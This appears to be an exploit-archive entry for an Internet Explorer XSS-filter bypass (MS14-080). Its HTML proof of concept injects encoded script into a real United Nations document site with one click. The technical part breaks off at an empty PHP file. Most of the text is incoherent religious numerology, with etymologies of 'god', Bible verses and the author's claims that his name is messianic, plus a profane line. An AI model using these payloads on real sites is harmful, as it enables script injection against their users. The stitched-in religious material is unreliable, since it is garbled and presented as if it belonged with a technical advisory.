Microsoft MS14-080 Proof Of Concept
| EKU-ID: 4522 | CVE: 2014-6365 | OSVDB-ID: |
| Author: Dieyu | Published: 2015-01-15 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 4522 | CVE: 2014-6365 | OSVDB-ID: |
| Author: Dieyu | Published: 2015-01-15 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
ieunxss
This is POC for: IE XSS Filter is bypassed, with one click.
Here is XSS at UN.org:
http://documents.un.org/lexicon_symbol.asp?DocSymbol=xxx
"xxx" is the point of XSS.
I could have used vulnerable web script made by myself, but Dieyu's style is always "realism".
UN is a big name, and it's funny to XSS it. :-)
Code is in "ieunxss-web":
Open "0.html", set language for the vulnerable website(required in this specific case);
Click "Go", click "test"("one click").
What will happen:
Script the target - check the "screenshot" folder.
"one click" can be covered with HTML tricks - looks absolutely normal.
I want it to be clear, so these tricks are not used here.
List of famous ways to call god:
* Dieu(motto of British Monarch)
* tien(Imperial Seal of China / 天 Wade-Giles)
* Elohim(Israel's Genesis 1:1)
Note: Similar: Elohim-eleui-edeui-dieu(o/əʊ;L/D)
Note: L and D are similar(speak "lay day"): Spanish "Dios" naturally changed to Yaqui "Lios".
List of 15 different "language family" samples:
+ dieu/deity * French/English * Indo-European
+ ilu * Sumerian * Language isolate
+ Diyin Ayóo Átʼéii * Navajo * Na-Dené
+ atua * Maori * Austronesian
+ tien(天 Wade-Giles) * Chinese * Sino-Tibetan
+ El * Northwest Semitic * Afro-Asiatic
+ Tirawa * Pawnee * Caddoan languages
+ ma'heo'o * Cheyenne * Algic
+ edoda(ᎡᏙᏓ) * Cherokee * Iroquoian
+ isten * Hungarian * Uralic
+ bečed * Avar * Northeast Caucasian
+ haneunim * Korean * Altaic
+ ọlọ́run * Yoruba * Niger–Congo
+ tatitu * Aymara * Aymaran
+ yosi * Chamicuro * Arawakan
Note: Pattern is: Israel Hebrew Elohim-eleui-edeui-dieu(o/əʊ;L/D) Yahweh-yw-yu
Note: w/u t/d o/əʊ L/D
Note: The list is not complete. For example, it does not include the famous Elohim.
"the whole world had one language and a common speech"(Genesis 11:1)
"LORD did there confound the language of all the earth"(Genesis 11:9)
"purify the lips of the peoples, that all of them may call on the name of the LORD"(Zephaniah 3:9)
"you will not see me again until you say, 'Blessed is he who comes in the name of the Lord.'"(Matthew 23:39)
"his name is called The Word of God"(Revelation 19:13)
Extremely different languages have very similar ways to call "god".
Even languages of the same "language family" can have very different ways to call "father":
Uralic Estonian "isa" vs Uralic Hungarian "apa"
High section of little finger: disconnects from level of sky;
middle section of little finger: disconnects from level of middle.
Note: Natural selection simply cannot explain such "coincidences".
On September 1st 1983, I got this name Diéyǔ from sky when I was born. There was an extremely huge butterfly(dié), and extremely heavy rain(yǔ).
Name: "you will not see me again until you say, 'Blessed is he who comes in the name of the Lord.'"(Matthew 23:39)
Appearance: "sword is proceeding out of his mouth"(Revelation 19:21) Impact: "Every eye will see"(Revelation 1:7)
Location: "from the east is visible even in the west"(Matthew 24:27) Color on earth: "his feet like unto fine brass"(Revelation 1:15)
It's unusual to see butterfly while rainy. "Then will appear the sign of the Son of Man in heaven" "great glory"(Matthew 24:30)
Famous ways to call god: Dieu(motto of British Monarch) tien(Imperial Seal of China / 天 Wade-Giles) "name is called The Word of God"(Revelation 19:13)
Most importantly, Yahweh and Israel: Yahweh-yw-yu Israel Hebrew Elohim-eleui-edeui-dieu(o/əʊ;L/D)
"coming out of" "mouth", "sword" - Revelation 1:16, Revelation 19:15, Revelation 19:21.
"come like a thief"(1 Thessalonians 5:2) "come like a thief"(2 Peter 3:10) "come like a thief"(Revelation 16:15)
Matthew 24:30 "on the clouds"(NIV)/"in the clouds"(KJV). Revelation 1:7 "with the clouds". on/in/with? Revelation is final words - "with".
The meaning of Diéyǔ(butterfly&rain) shall be power of sky: from crawling to flying, and from cloud to earth.
First Coming's life is DIRECTLY from God(virgin birth). Second Coming's name is DIRECTLY God's name(Matthew 23:39).
"anyone says to you, 'Look, here is the Messiah!'" "do not believe it"(Matthew 24:23) Because of having a much greater title - God's name(Matthew 23:39).
GOkeep FUCKinserting YOURSELFvoice(Great Whore)
666-6openonhead-6thsectionoftwohands
right-write-Correct wrong-run-hitting-NotCorrect
"666"(Revelation 13:18) needs "wisdom" - it's clearly explained(Revelation 17:9-15): "wisdom"-"seven"/"ten"-"peoples"/"beast"-"sit".
"Typing on keyboard" and "run": hitting, one point touching the surface, then another point touching the surface.
"great whore"(Revelation 17:1) "The woman you saw is the great city"(Revelation 17:18) - "great city" is hub of MANY people being together.
--0.html--
<a target="_blank" href="http://192.168.1.101/ieunxss-web/1.php?a=<SCRIPT>alert(1);</SCRIPT>">Confirm: XSS Filter is on.</a><br>
<a target="n" href="http://documents.un.org/welcome.asp?language=E">UN Doc - language=E (new tab)</a><br>
Click "Simple Search" - Language of UN Doc will be chosen.<br>
<br>
<br>
<a target="i" href="http://documents.un.org/lexicon_symbol.asp?DocSymbol=xxx"><a href='?DocSymbol=yyy%22>%20zzz%253Cscript%253Ealert%2528document.domain%2529%253B%253C%252Fscript%253E'>test</a>">Go</a><br>
Click "test"<br>
<iframe width=500 height=500 name=i id=i sandbox="allow-scripts allow-forms allow-same-origin"></iframe>
--1.php--
<?php